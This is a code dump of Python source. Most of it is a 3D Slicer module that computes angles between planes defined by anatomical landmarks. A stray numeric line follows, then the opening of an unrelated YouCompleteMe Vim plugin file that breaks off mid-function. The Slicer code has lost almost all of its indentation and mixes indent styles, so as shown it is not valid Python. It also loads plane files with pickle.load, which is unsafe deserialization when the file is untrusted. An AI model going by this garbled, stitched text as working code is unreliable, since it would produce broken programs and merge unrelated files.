sampleVolumeNode.SetAndObserveImageData(imageData)
sampleVolumeNode.SetLabelMap(1)
labelmapVolumeDisplayNode = slicer.vtkMRMLLabelMapVolumeDisplayNode()
slicer.mrmlScene.AddNode(labelmapVolumeDisplayNode)
colorNode = slicer.util.getNode('GenericAnatomyColors')
labelmapVolumeDisplayNode.SetAndObserveColorNodeID(colorNode.GetID())
labelmapVolumeDisplayNode.VisibilityOn()
sampleVolumeNode.SetAndObserveDisplayNodeID(labelmapVolumeDisplayNode.GetID())
count = slicer.mrmlScene.GetNumberOfNodesByClass('vtkMRMLSliceCompositeNode')
for n in xrange(count):
compNode = slicer.mrmlScene.GetNthNodeByClass(n, 'vtkMRMLSliceCompositeNode')
compNode.SetBackgroundVolumeID(sampleVolumeNode.GetID())
def onAddMidPoint(self):
f1 = self.landmarkComboBox1MidPoint.currentText
f2 = self.landmarkComboBox2MidPoint.currentText
p1 = f1[0:f1.find("-")]
print p1
fidlist1 = slicer.mrmlScene.GetNodesByClassByName('vtkMRMLMarkupsFiducialNode', p1).GetItemAsObject(0)
index1 = fidlist1.GetMarkupIndexByID(self.midPointFiducialDictionaryID[f1])
coord1 = numpy.zeros(3)
fidlist1.GetNthFiducialPosition(index1, coord1)
p2 = f2[0:f2.find("-")]
print p2
fidlist2 = slicer.mrmlScene.GetNodesByClassByName('vtkMRMLMarkupsFiducialNode', p2).GetItemAsObject(0)
index2 = fidlist2.GetMarkupIndexByID(self.midPointFiducialDictionaryID[f2])
coord2 = numpy.zeros(3)
fidlist2.GetNthFiducialPosition(index2, coord2)
coord = coord1 + coord2
coord /= 2
fidlist1.AddFiducial(coord[0], coord[1], coord[2])
if p1 != p2:
fidlist2.AddFiducial(coord[0], coord[1], coord[2])
fidlist2.SetNthFiducialVisibility(fidlist2.GetNumberOfFiducials() - 1, False)
def onFiducialAddedMidPoint(self, obj, event):
fidlist = obj
label = fidlist.GetNthFiducialLabel(fidlist.GetNumberOfFiducials() - 1)
self.midPointFiducialDictionaryID[label] = fidlist.GetNthMarkupID(fidlist.GetNumberOfFiducials() - 1)
self.landmarkComboBox1MidPoint.addItem(label)
self.landmarkComboBox2MidPoint.addItem(label)
def onFiducialRemovedMidPoint(self, obj, event):
fidlist = obj
print obj
for i in range(1, self.landmarkComboBox1MidPoint.count):
print i
label = self.landmarkComboBox1MidPoint.itemText(i)
found = self.fiducialInListMidPoint(label, fidlist)
if not found:
del self.midPointFiducialDictionaryID[label]
self.landmarkComboBox1MidPoint.removeItem(i)
self.landmarkComboBox2MidPoint.removeItem(i)
break
def fiducialInListMidPoint(self, name, fidlist):
for i in range(0, fidlist.GetNumberOfFiducials()):
if name == fidlist.GetNthFiducialLabel(i) :
return True
return False
def onCloseScene(self, obj, event):
keys = self.planeControlsDictionary.keys()
for i in range(0, len(keys)):
self.planeControlsDictionary[keys[i]].remove()
del self.planeControlsDictionary[keys[i]]
globals()[self.moduleName] = slicer.util.reloadScriptedModule(self.moduleName)
def angleValue(self):
self.valueComboBox()
self.getAngle_RL.setText(self.logic.angle_degre_RL)
self.getAngle_RL_comp.setText(self.logic.angle_degre_RL_comp)
self.getAngle_SI.setText(self.logic.angle_degre_SI)
self.getAngle_SI_comp.setText(self.logic.angle_degre_SI_comp)
self.getAngle_AP.setText(self.logic.angle_degre_AP)
self.getAngle_AP_comp.setText(self.logic.angle_degre_AP_comp)
def valueComboBox(self):
colorPlane1 = self.planeComboBox1.currentText
colorPlane2 = self.planeComboBox2.currentText
print colorPlane1
print colorPlane2
redslice = slicer.mrmlScene.GetNodeByID('vtkMRMLSliceNodeRed')
redslice.SetWidgetVisible(False)
yellowslice = slicer.mrmlScene.GetNodeByID('vtkMRMLSliceNodeYellow')
yellowslice.SetWidgetVisible(False)
greenslice = slicer.mrmlScene.GetNodeByID('vtkMRMLSliceNodeGreen')
greenslice.SetWidgetVisible(False)
self.defineAngle(colorPlane1,colorPlane2)
def modify(self, obj, event):
self.defineAngle(self.planeComboBox1.currentText, self.planeComboBox2.currentText)
def defineAngle(self, colorPlane1, colorPlane2):
print "DEFINE ANGLE"
print colorPlane1
if colorPlane1 in self.logic.ColorNodeCorrespondence:
slice1 = slicer.util.getNode(self.logic.ColorNodeCorrespondence[colorPlane1])
self.logic.getMatrix(slice1)
slice1.SetWidgetVisible(True)
matrix1 = self.logic.getMatrix(slice1)
normal1 = self.logic.defineNormal(matrix1)
else:
normal1 = self.planeControlsDictionary[colorPlane1].logic.N
print colorPlane2
if colorPlane2 in self.logic.ColorNodeCorrespondence:
slice2 = slicer.util.getNode(self.logic.ColorNodeCorrespondence[colorPlane2])
self.logic.getMatrix(slice2)
slice2.SetWidgetVisible(True)
matrix2 = self.logic.getMatrix(slice2)
normal2 = self.logic.defineNormal(matrix2)
else:
normal2 = self.planeControlsDictionary[colorPlane2].logic.N
self.logic.getAngle(normal1, normal2)
def onSavePlanes(self):
self.savePlanes()
def savePlanes(self, filename = None):
tempDictionary = {}
sliceRed = slicer.util.getNode(self.logic.ColorNodeCorrespondence['red'])
tempDictionary["red"] = self.logic.getMatrix(sliceRed).tolist()
sliceYellow = slicer.util.getNode(self.logic.ColorNodeCorrespondence['yellow'])
tempDictionary["yellow"] = self.logic.getMatrix(sliceYellow).tolist()
sliceGreen = slicer.util.getNode(self.logic.ColorNodeCorrespondence['green'])
tempDictionary["green"] = self.logic.getMatrix(sliceGreen).tolist()
tempDictionary["customPlanes"] = {}
for key, plane in self.planeControlsDictionary.items():
tempDictionary["customPlanes"][plane.id] = plane.getFiducials()
print filename
if filename is None:
filename = qt.QFileDialog.getSaveFileName(parent=self, caption='Save file')
if filename != "":
fileObj = open(filename, "wb")
pickle.dump(tempDictionary, fileObj)
fileObj.close()
def onReadPlanes(self):
self.readPlanes()
def readPlanes(self, filename=None):
if filename is None:
filename = qt.QFileDialog.getOpenFileName(parent=self,caption='Open file')
if filename != "":
fileObj = open(filename, "rb")
tempDictionary = pickle.load( fileObj )
node = slicer.mrmlScene.GetNodeByID('vtkMRMLSliceNodeRed')
matList = tempDictionary["red"]
matNode = node.GetSliceToRAS()
for col in range(0, len(matList)):
for row in range(0, len(matList[col])):
matNode.SetElement(col, row, matList[col][row])
node = slicer.mrmlScene.GetNodeByID('vtkMRMLSliceNodeYellow')
matList = tempDictionary["yellow"]
matNode = node.GetSliceToRAS()
for col in range(0, len(matList)):
for row in range(0, len(matList[col])):
matNode.SetElement(col, row, matList[col][row])
node = slicer.mrmlScene.GetNodeByID('vtkMRMLSliceNodeGreen')
matList = tempDictionary["green"]
matNode = node.GetSliceToRAS()
for col in range(0, len(matList)):
for row in range(0, len(matList[col])):
matNode.SetElement(col, row, matList[col][row])
customPlanes = tempDictionary["customPlanes"]
for key, fidlist in customPlanes.items():
self.addNewPlane(key)
tempkey = "Plane " + str(self.planeControlsId)
currentFidList = self.planeControlsDictionary[tempkey].logic.getFiducialList()
for i in range(0, len(fidlist)):
f = fidlist[i]
currentFidList.AddFiducial(f[0], f[1], f[2])
fileObj.close()
# This widget controls each of the planes that are added to the interface.
# The widget contains its own logic, i.e. an object of AnglePlanesLogic.
# Each plane contains a separate fiducial list. The planes are named P1, P2, ..., PN. The landmarks are named
# P1-1, P1-2, ..., P1-N.
class AnglePlanesWidgetPlaneControl(qt.QFrame):
def __init__(self, anglePlanes, id, pointlocatordictionary):
qt.QFrame.__init__(self)
self.id = id
self.setLayout(qt.QFormLayout())
self.pointLocatorDictionary = pointlocatordictionary
landmarkLayout = qt.QHBoxLayout()
planeLabel = qt.QLabel('Plane ' + str(id) + ":")
landmarkLayout.addWidget(planeLabel)
self.logic = AnglePlanesLogic(id)
label1 = qt.QLabel(' L1:')
self.landmark1ComboBox = qt.QComboBox()
landmark1ComboBox = self.landmark1ComboBox
landmark1ComboBox.addItem("Select")
landmark1ComboBox.connect('currentIndexChanged(QString)', self.placePlaneClicked)
landmarkLayout.addWidget(label1)
landmarkLayout.addWidget(landmark1ComboBox)
label2 = qt.QLabel(' L2:')
self.landmark2ComboBox = qt.QComboBox()
landmark2ComboBox = self.landmark2ComboBox
landmark2ComboBox.addItem("Select")
landmark2ComboBox.connect('currentIndexChanged(QString)', self.placePlaneClicked)
landmarkLayout.addWidget(label2)
landmarkLayout.addWidget(landmark2ComboBox)
label3 = qt.QLabel(' L3:')
self.landmark3ComboBox = qt.QComboBox()
landmark3ComboBox = self.landmark3ComboBox
landmark3ComboBox.addItem("Select")
landmark3ComboBox.connect('currentIndexChanged(QString)', self.placePlaneClicked)
landmarkLayout.addWidget(label3)
landmarkLayout.addWidget(landmark3ComboBox)
addFiducialLabel = qt.QLabel('Add')
addFiducialButton = qt.QPushButton(qt.QIcon(":/Icons/MarkupsAddFiducial.png"), " ")
addFiducialButton.setFixedSize(50,25)
addFiducialButton.connect('clicked()', self.addLandMarkClicked)
addFiducialButton.setEnabled(True)
landmarkLayout.addWidget(addFiducialLabel)
landmarkLayout.addWidget(addFiducialButton)
#fiducial list for the plane
fidNode = self.logic.getFiducialList()
for i in range(0, fidNode.GetNumberOfFiducials()):
label = fidNode.GetNthFiducialLabel(i)
landmark1ComboBox.addItem(label)
landmark2ComboBox.addItem(label)
landmark3ComboBox.addItem(label)
anglePlanes.landmarkComboBox1MidPoint.addItem(label)
anglePlanes.landmarkComboBox2MidPoint.addItem(label)
anglePlanes.midPointFiducialDictionaryID[label] = fidNode.GetNthMarkupID(i)
fidNode.AddObserver(fidNode.MarkupAddedEvent, self.onFiducialAdded)
fidNode.AddObserver(fidNode.MarkupRemovedEvent, self.onFiducialRemoved)
self.setPointModifiedEventId = fidNode.AddObserver(fidNode.PointModifiedEvent, self.onPointModifiedEvent)
# These observers live in AnglePlanesWidget; they listen for any fiducial being added
#
fidNode.AddObserver(fidNode.MarkupAddedEvent, anglePlanes.onFiducialAddedMidPoint)
fidNode.AddObserver(fidNode.MarkupRemovedEvent, anglePlanes.onFiducialRemovedMidPoint)
self.layout().addRow(landmarkLayout)
self.slider = ctk.ctkSliderWidget()
slider = self.slider
slider.singleStep = 0.1
slider.minimum = 0.1
slider.maximum = 10
slider.value = 1.0
slider.toolTip = "Set the size of your plane."
self.slideOpacity = ctk.ctkSliderWidget()
slideOpacity = self.slideOpacity
slideOpacity.singleStep = 0.1
slideOpacity.minimum = 0.1
slideOpacity.maximum = 1
slideOpacity.value = 1.0
slideOpacity.toolTip = "Set the opacity of your plane."
slider.connect('valueChanged(double)', self.placePlaneClicked)
slideOpacity.connect('valueChanged(double)', self.placePlaneClicked)
landmarkSliderLayout = qt.QHBoxLayout()
label = qt.QLabel(' Size:')
label2 = qt.QLabel(' Opacity:')
landmarkSliderLayout.addWidget(label)
landmarkSliderLayout.addWidget(self.slider)
landmarkSliderLayout.addWidget(label2)
landmarkSliderLayout.addWidget(self.slideOpacity)
self.surfaceDeplacementCheckBox = qt.QCheckBox("On Surface")
self.surfaceDeplacementCheckBox.setChecked(True)
self.surfaceDeplacementCheckBox.connect('stateChanged(int)', self.onSurfaceDeplacementStateChanged)
landmarkSliderLayout.addWidget(self.surfaceDeplacementCheckBox)
self.layout().addRow(landmarkSliderLayout)
def remove(self):
self.logic.remove()
def onFiducialRemoved(self, obj, event):
fidlist = obj
for i in range(1, self.landmark1ComboBox.count):
#print i
found = self.fiducialInList(self.landmark1ComboBox.itemText(i), fidlist)
if not found:
self.landmark1ComboBox.removeItem(i)
self.landmark2ComboBox.removeItem(i)
self.landmark3ComboBox.removeItem(i)
break
def getFiducials(self):
fidNode = self.logic.getFiducialList()
listCoord = list()
coord = numpy.zeros(3)
fidNode.GetNthFiducialPosition(int(self.landmark1ComboBox.currentIndex)-1, coord)
listCoord.append(coord)
fidNode.GetNthFiducialPosition(int(self.landmark2ComboBox.currentIndex)-1, coord)
listCoord.append(coord)
fidNode.GetNthFiducialPosition(int(self.landmark3ComboBox.currentIndex)-1, coord)
listCoord.append(coord)
return listCoord
def placePlaneClicked(self):
self.update()
def fiducialInList(self, name, fidlist):
for i in range(0, fidlist.GetNumberOfFiducials()):
if name == fidlist.GetNthFiducialLabel(i) :
return True
return False
def projectAllFiducials(self):
fidlist = self.logic.getFiducialList()
for i in range(0, fidlist.GetNumberOfFiducials()):
self.projectFiducialOnClosestSurface(fidlist, i, self.pointLocatorDictionary)
def onPointModifiedEvent(self, obj, event):
if self.surfaceDeplacementCheckBox.isChecked():
self.projectAllFiducials()
self.update()
def onSurfaceDeplacementStateChanged(self):
if self.surfaceDeplacementCheckBox.isChecked():
self.projectAllFiducials()
self.update()
def update(self):
# print "landmarks index " + str(self.landmark1ComboBox.currentIndex) + ", " + str(self.landmark2ComboBox.currentIndex) + ", " + str(self.landmark3ComboBox.currentIndex) + ", "
if self.landmark1ComboBox.currentIndex > 0 and self.landmark2ComboBox.currentIndex > 0 and self.landmark3ComboBox.currentIndex > 0:
self.logic.planeLandmarks(self.landmark1ComboBox.currentIndex, self.landmark2ComboBox.currentIndex, self.landmark3ComboBox.currentIndex, self.slider.value, self.slideOpacity.value)
def projectFiducialOnClosestSurface(self, fidlist, fidid, pointLocatorDictionary):
landmarkCoord = numpy.zeros(3)
fidlist.GetNthFiducialPosition(fidid, landmarkCoord)
minDistance = MAXINT
minClosestPoint = numpy.zeros(3)
#print "landmark: " + str(landmarkCoord) + ", fidid: " + str(fidid)
keys = pointLocatorDictionary.keys()
for i in range(0, len(keys)):
locator = pointLocatorDictionary[keys[i]]
closestpointid = locator.FindClosestPoint(landmarkCoord)
mrmlmodelcollection = slicer.mrmlScene.GetNodesByClassByName("vtkMRMLModelNode", keys[i])
modelnode = mrmlmodelcollection.GetItemAsObject(0)
closestpoint = modelnode.GetPolyData().GetPoints().GetPoint(closestpointid)
#print "closestpointid:" + str(closestpointid) + ", point: " + str(closestpoint)
distance = numpy.linalg.norm( closestpoint - landmarkCoord )
#print "distance: " + str(distance)
if distance < minDistance:
minDistance = distance
minClosestPoint = closestpoint
if minClosestPoint[0] !=landmarkCoord[0] or minClosestPoint[1] != landmarkCoord[1] or minClosestPoint[2] != landmarkCoord[2]:
fidlist.RemoveObserver(self.setPointModifiedEventId)
fidlist.SetNthFiducialPosition(fidid, minClosestPoint[0], minClosestPoint[1], minClosestPoint[2])
self.setPointModifiedEventId = fidlist.AddObserver(fidlist.PointModifiedEvent, self.onPointModifiedEvent)
def addLandMarkClicked(self):
#print "Add landmarks"
# # Place landmarks in the 3D scene
fidlist = self.logic.getFiducialList()
slicer.mrmlScene.AddNode(fidlist)
interactionNode = slicer.mrmlScene.GetNodeByID("vtkMRMLInteractionNodeSingleton")
interactionNode.SetCurrentInteractionMode(1)
def onFiducialAdded(self, obj, event):
fidlist = obj
label = fidlist.GetNthFiducialLabel(fidlist.GetNumberOfFiducials() - 1)
self.landmark1ComboBox.addItem(label)
self.landmark2ComboBox.addItem(label)
self.landmark3ComboBox.addItem(label)
class AnglePlanesLogic(ScriptedLoadableModuleLogic):
def __init__(self, id = -1):
self.ColorNodeCorrespondence = {'red': 'vtkMRMLSliceNodeRed',
'yellow': 'vtkMRMLSliceNodeYellow',
'green': 'vtkMRMLSliceNodeGreen'}
self.id = id
self.initialize()
def initialize(self):
self.layoutManager=slicer.app.layoutManager()
self.threeDWidget=self.layoutManager.threeDWidget(0)
self.threeDView=self.threeDWidget.threeDView()
self.renderWindow=self.threeDView.renderWindow()
self.renderers=self.renderWindow.GetRenderers()
self.renderer=self.renderers.GetFirstRenderer()
self.polydata = vtk.vtkPolyData()
self.points = vtk.vtkPoints()
self.planeSource = vtk.vtkPlaneSource()
self.mapper = vtk.vtkPolyDataMapper()
self.actor = vtk.vtkActor()
self.renderer.AddViewProp(self.actor)
self.renderWindow.AddRenderer(self.renderer)
def remove(self):
self.renderer.RemoveViewProp(self.actor)
self.renderer.Render()
def getFiducialList(self):
P = self.getFiducialListName()
nodes = slicer.mrmlScene.GetNodesByClassByName('vtkMRMLMarkupsFiducialNode', P)
if nodes.GetNumberOfItems() == 0:
# The list does not exist so we create it
fidNode = slicer.vtkMRMLMarkupsFiducialNode()
fidNode.SetName(P)
slicer.mrmlScene.AddNode(fidNode)
else:
#The list exists but the observers must be updated
fidNode = nodes.GetItemAsObject(0)
return fidNode
def getFiducialListName(self) :
return "P" + str(self.id)
def getMatrix(self, slice):
self.mat = slice.GetSliceToRAS()
print self.mat
# Build a numpy matrix from the elements of the slice's SliceToRAS
m = numpy.matrix([[self.mat.GetElement(0,0), self.mat.GetElement(0,1), self.mat.GetElement(0,2), self.mat.GetElement(0,3)],
[self.mat.GetElement(1,0), self.mat.GetElement(1,1), self.mat.GetElement(1,2), self.mat.GetElement(1,3)],
[self.mat.GetElement(2,0), self.mat.GetElement(2,1), self.mat.GetElement(2,2), self.mat.GetElement(2,3)],
[self.mat.GetElement(3,0), self.mat.GetElement(3,1), self.mat.GetElement(3,2), self.mat.GetElement(3,3)]])
return m
def defineNormal(self, matrix):
# Normal vector to the Red slice:
n_vector = numpy.matrix([[0],[0],[1],[1]])
# point on the Red slice:
A = numpy.matrix([[0], [0], [0], [1]])
normalVector = matrix * n_vector
#print "n : \n", normalVector
A = matrix * A
normalVector1 = normalVector
normalVector1[0] = normalVector[0] - A[0]
normalVector1[1] = normalVector[1] - A[1]
normalVector1[2] = normalVector[2] - A[2]
#print normalVector1
return normalVector1
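# Added note: defineNormal maps the canonical slice normal (0, 0, 1) and the
# slice origin (0, 0, 0) through the 4x4 SliceToRAS matrix, then subtracts
# the mapped origin so that only the rotational part remains; the result is
# the plane normal as a direction vector in RAS space.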
def getAngle(self, normalVect1, normalVect2):
norm1 = sqrt(normalVect1[0]*normalVect1[0]+normalVect1[1]*normalVect1[1]+normalVect1[2]*normalVect1[2])
#print "norme 1: \n", norm1
norm2 =sqrt(normalVect2[0]*normalVect2[0]+normalVect2[1]*normalVect2[1]+normalVect2[2]*normalVect2[2])
#print "norme 2: \n", norm2
scalar_product = (normalVect1[0]*normalVect2[0]+normalVect1[1]*normalVect2[1]+normalVect1[2]*normalVect2[2])
#print "scalar product : \n", scalar_product
angle = acos(scalar_product/(norm1*norm2))
#print "radian angle : ", angle
angle_degree = angle*180/pi
#print "Angle in degree", angle_degree
norm1_RL = sqrt(normalVect1[1]*normalVect1[1]+normalVect1[2]*normalVect1[2])
#print "norme RL: \n", norm1_RL
norm2_RL =sqrt(normalVect2[1]*normalVect2[1]+normalVect2[2]*normalVect2[2])
#print "norme RL: \n", norm2_RL
if (norm1_RL == 0 or norm2_RL == 0):
self.angle_degre_RL = 0
self.angle_degre_RL_comp = 0
else:
scalar_product_RL = (normalVect1[1]*normalVect2[1]+normalVect1[2]*normalVect2[2])
#print "scalar product : \n", scalar_product_RL
angleRL = acos(scalar_product_RL/(norm1_RL*norm2_RL))
#print "radian angle : ", angleRL
self.angle_degre_RL = angleRL*180/pi
self.angle_degre_RL = round(self.angle_degre_RL,2)
#print self.angle_degre_RL
self.angle_degre_RL_comp = 180-self.angle_degre_RL
norm1_SI = sqrt(normalVect1[0]*normalVect1[0]+normalVect1[1]*normalVect1[1])
#print "norme1_SI : \n", norm1_SI
norm2_SI =sqrt(normalVect2[0]*normalVect2[0]+normalVect2[1]*normalVect2[1])
#print "norme2_SI : \n", norm2_SI
if (norm1_SI ==0 or norm2_SI ==0):
self.angle_degre_SI = 0
self.angle_degre_SI_comp = 0
else:
scalar_product_SI = (normalVect1[0]*normalVect2[0]+normalVect1[1]*normalVect2[1])
#print "scalar product_SI : \n", scalar_product_SI
angleSI = acos(scalar_product_SI/(norm1_SI*norm2_SI))
#print "radian angle : ", angleSI
self.angle_degre_SI = angleSI*180/pi
self.angle_degre_SI = round(self.angle_degre_SI,2)
#print self.angle_degre_SI
self.angle_degre_SI_comp = 180-self.angle_degre_SI
#print self.angle_degre_SI_comp
norm1_AP = sqrt(normalVect1[0]*normalVect1[0]+normalVect1[2]*normalVect1[2])
#print "norme1_SI : \n", norm1_AP
norm2_AP =sqrt(normalVect2[0]*normalVect2[0]+normalVect2[2]*normalVect2[2])
#print "norme2_SI : \n", norm2_AP
if (norm1_AP ==0 or norm2_AP ==0):
self.angle_degre_AP = 0
self.angle_degre_AP_comp = 0
else:
scalar_product_AP = (normalVect1[0]*normalVect2[0]+normalVect1[2]*normalVect2[2])
#print "scalar product_SI : \n", scalar_product_AP
#print "VALUE :", scalar_product_AP/(norm1_AP*norm2_AP)
angleAP = acos(scalar_product_AP/(norm1_AP*norm2_AP))
#print "radian angle : ", angleAP
self.angle_degre_AP = angleAP*180/pi
self.angle_degre_AP = round(self.angle_degre_AP,2)
#print self.angle_degre_AP
self.angle_degre_AP_comp = 180-self.angle_degre_AP
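# Summary (added for clarity): each "view" angle is the angle between the two
# normals projected onto a coordinate plane (the R-L view drops the x
# component, S-I drops z, A-P drops y), computed as acos(dot / (|u| * |v|)),
# converted to degrees and rounded to two decimals.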
def normalLandmarks(self, GA, GB):
Vn = numpy.matrix([[0.],[0.],[0.]])  # float dtype, so the assignments below are not truncated to ints
Vn[0] = GA[1]*GB[2] - GA[2]*GB[1]
Vn[1] = GA[2]*GB[0] - GA[0]*GB[2]
Vn[2] = GA[0]*GB[1] - GA[1]*GB[0]
#print "Vn = ",Vn
norm_Vn = sqrt(Vn[0]*Vn[0]+Vn[1]*Vn[1]+Vn[2]*Vn[2])
Normal = Vn/norm_Vn
#print "N = ",Normal
return Normal
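# Added note: normalLandmarks returns the normalized cross product GA x GB;
# with plain 1-D arrays the equivalent (illustrative) numpy form would be:
#   n = numpy.cross(GA, GB); n = n / numpy.linalg.norm(n)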
def planeLandmarks(self, Landmark1Value, Landmark2Value, Landmark3Value, slider, sliderOpacity):
# Limit the number of 3 landmarks to define a plane
# Keep the coordinates of the landmarks
fidNode = self.getFiducialList()
r1 = 0
a1 = 0
s1 = 0
coord = numpy.zeros(3)
if Landmark1Value != 0:
fidNode.GetNthFiducialPosition(int(Landmark1Value)-1, coord)
r1 = coord[0]
a1 = coord[1]
s1 = coord[2]
# Limit the number of 3 landmarks to define a plane
# Keep the coordinates of the landmarks
r2 = 0
a2 = 0
s2 = 0
if Landmark2Value != 0:
fidNode.GetNthFiducialPosition(int(Landmark2Value)-1, coord)
r2 = coord[0]
a2 = coord[1]
s2 = coord[2]
# Limit the number of 3 landmarks to define a plane
# Keep the coordinates of the landmarks
r3 = 0
a3 = 0
s3 = 0
if Landmark3Value != 0:
fidNode.GetNthFiducialPosition(int(Landmark3Value)-1, coord)
r3 = coord[0]
a3 = coord[1]
s3 = coord[2]
points = self.points
if points.GetNumberOfPoints() == 0:
points.InsertNextPoint(r1,a1,s1)
points.InsertNextPoint(r2,a2,s2)
points.InsertNextPoint(r3,a3,s3)
else:
points.SetPoint(0, r1,a1,s1)
points.SetPoint(1, r2,a2,s2)
points.SetPoint(2, r3,a3,s3)
polydata = self.polydata
polydata.SetPoints(points)
centerOfMass = vtk.vtkCenterOfMass()
centerOfMass.SetInputData(polydata)
centerOfMass.SetUseScalarsAsWeights(False)
centerOfMass.Update()
G = centerOfMass.GetCenter()
#print "Center of mass = ",G
A = (r1,a1,s1)
B = (r2,a2,s2)
C = (r3,a3,s3)
# Vector GA
GA = numpy.matrix([[0.],[0.],[0.]])  # float dtype avoids integer truncation
GA[0] = A[0]-G[0]
GA[1] = A[1]-G[1]
GA[2] = A[2]-G[2]
#print "GA = ", GA
# Vector GB
GB = numpy.matrix([[0.],[0.],[0.]])
GB[0] = B[0]-G[0]
GB[1] = B[1]-G[1]
GB[2] = B[2]-G[2]
#print "GB = ", GB
# Vector GC
GC = numpy.matrix([[0.],[0.],[0.]])
GC[0] = C[0]-G[0]
GC[1] = C[1]-G[1]
GC[2] = C[2]-G[2]
#print "GC = ", GC
self.N = self.normalLandmarks(GA,GB)
D = numpy.matrix([[0.],[0.],[0.]])
E = numpy.matrix([[0.],[0.],[0.]])
F = numpy.matrix([[0.],[0.],[0.]])
D[0] = slider*GA[0] + G[0]
D[1] = slider*GA[1] + G[1]
D[2] = slider*GA[2] + G[2]
#print "Slider value : ", slider
#print "D = ",D
E[0] = slider*GB[0] + G[0]
E[1] = slider*GB[1] + G[1]
E[2] = slider*GB[2] + G[2]
#print "E = ",E
F[0] = slider*GC[0] + G[0]
F[1] = slider*GC[1] + G[1]
F[2] = slider*GC[2] + G[2]
#print "F = ",F
planeSource = self.planeSource
planeSource.SetNormal(self.N[0],self.N[1],self.N[2])
planeSource.SetOrigin(D[0],D[1],D[2])
planeSource.SetPoint1(E[0],E[1],E[2])
planeSource.SetPoint2(F[0],F[1],F[2])
planeSource.Update()
plane = planeSource.GetOutput()
mapper = self.mapper
mapper.SetInputData(plane)
mapper.Update()
self.actor.SetMapper(mapper)
self.actor.GetProperty().SetColor(0, 0.4, 0.8)
self.actor.GetProperty().SetOpacity(sliderOpacity)
self.renderer.Render()
self.renderWindow.Render()
class AnglePlanesTest(ScriptedLoadableModuleTest):
def setUp(self):
# reset the state - clear scene
slicer.mrmlScene.Clear(0)
def runTest(self):
# run all tests needed
self.setUp()
self.test_AnglePlanes()
def test_AnglePlanes(self):
self.delayDisplay('Starting the test')
self.delayDisplay('Adding planes')
widget = AnglePlanesWidget()
widget.addNewPlane()
widget.addNewPlane()
self.delayDisplay('Adding fiducials')
fidlist1 = slicer.mrmlScene.GetNodesByClassByName('vtkMRMLMarkupsFiducialNode', "P1").GetItemAsObject(0)
fidlist1.AddFiducial(10,10,10)
fidlist1.AddFiducial(20,20,20)
fidlist1.AddFiducial(10,20,30)
fidlist2 = slicer.mrmlScene.GetNodesByClassByName('vtkMRMLMarkupsFiducialNode', "P2").GetItemAsObject(0)
fidlist2.AddFiducial(50,50,50)
fidlist2.AddFiducial(40,20,80)
fidlist2.AddFiducial(10,40,20)
self.delayDisplay('Saving planes')
widget.savePlanes("test.p")
self.delayDisplay('Loading planes')
widget.readPlanes("test.p")
self.delayDisplay('Selecting fiducials')
widget.planeControlsDictionary["Plane 1"].landmark1ComboBox.setCurrentIndex(1)
widget.planeControlsDictionary["Plane 1"].landmark2ComboBox.setCurrentIndex(2)
widget.planeControlsDictionary["Plane 1"].landmark3ComboBox.setCurrentIndex(3)
widget.planeControlsDictionary["Plane 2"].landmark1ComboBox.setCurrentIndex(1)
widget.planeControlsDictionary["Plane 2"].landmark2ComboBox.setCurrentIndex(2)
widget.planeControlsDictionary["Plane 2"].landmark3ComboBox.setCurrentIndex(3)
self.delayDisplay('Selecting planes')
widget.planeComboBox1.setCurrentIndex(5)
widget.planeComboBox2.setCurrentIndex(6)
self.delayDisplay('Calculating angle')
widget.angleValue()
test = widget.logic.angle_degre_RL != 59.06 or widget.logic.angle_degre_RL_comp != 120.94 or widget.logic.angle_degre_SI != 12.53 or widget.logic.angle_degre_SI_comp != 167.47 or widget.logic.angle_degre_AP != 82.56 or widget.logic.angle_degre_AP_comp != 97.44
self.delayDisplay('Testing angles')
        if test:
            print "", "Angle", "Complementary"
            print "R-L-View", widget.logic.angle_degre_RL, widget.logic.angle_degre_RL_comp
            print "S-I-View", widget.logic.angle_degre_SI, widget.logic.angle_degre_SI_comp
            print "A-P-View", widget.logic.angle_degre_AP, widget.logic.angle_degre_AP_comp
            self.delayDisplay('Test Failure!')
else:
self.delayDisplay('Test passed!')
widget.parent.close()
| 0.009627 |
# Copyright (C) 2011, 2012 Google Inc.
#
# This file is part of YouCompleteMe.
#
# YouCompleteMe is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# YouCompleteMe is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with YouCompleteMe. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from future import standard_library
standard_library.install_aliases()
from builtins import * # noqa
from future.utils import iteritems
from ycm import vimsupport
from ycmd import user_options_store
from ycmd import request_wrap
from ycmd import identifier_utils
YCM_VAR_PREFIX = 'ycm_'
def BuildServerConf():
"""Builds a dictionary mapping YCM Vim user options to values. Option names
don't have the 'ycm_' prefix."""
# We only evaluate the keys of the vim globals and not the whole dictionary
# to avoid unicode issues.
# See https://github.com/Valloric/YouCompleteMe/pull/2151 for details.
keys = vimsupport.GetVimGlobalsKeys()
server_conf = {}
for key in keys:
if not key.startswith( YCM_VAR_PREFIX ):
continue
new_key = key[ len( YCM_VAR_PREFIX ): ]
new_value = vimsupport.VimExpressionToPythonType( 'g:' + key )
server_conf[ new_key ] = new_value
return server_conf
def LoadJsonDefaultsIntoVim():
defaults = user_options_store.DefaultOptions()
for key, value in iteritems( defaults ):
new_key = 'g:ycm_' + key
if not vimsupport.VariableExists( new_key ):
vimsupport.SetVariableValue( new_key, value )
def CompletionStartColumn():
return ( request_wrap.CompletionStartColumn(
vimsupport.CurrentLineContents(),
vimsupport.CurrentColumn() + 1,
vimsupport.CurrentFiletypes()[ 0 ] ) - 1 )
def CurrentIdentifierFinished():
current_column = vimsupport.CurrentColumn()
previous_char_index = current_column - 1
if previous_char_index < 0:
return True
line = vimsupport.CurrentLineContents()
filetype = vimsupport.CurrentFiletypes()[ 0 ]
regex = identifier_utils.IdentifierRegexForFiletype( filetype )
for match in regex.finditer( line ):
if match.end() == previous_char_index:
return True
# If the whole line is whitespace, that means the user probably finished an
# identifier on the previous line.
return line[ : current_column ].isspace()
def LastEnteredCharIsIdentifierChar():
current_column = vimsupport.CurrentColumn()
if current_column - 1 < 0:
return False
line = vimsupport.CurrentLineContents()
filetype = vimsupport.CurrentFiletypes()[ 0 ]
return (
identifier_utils.StartOfLongestIdentifierEndingAtIndex(
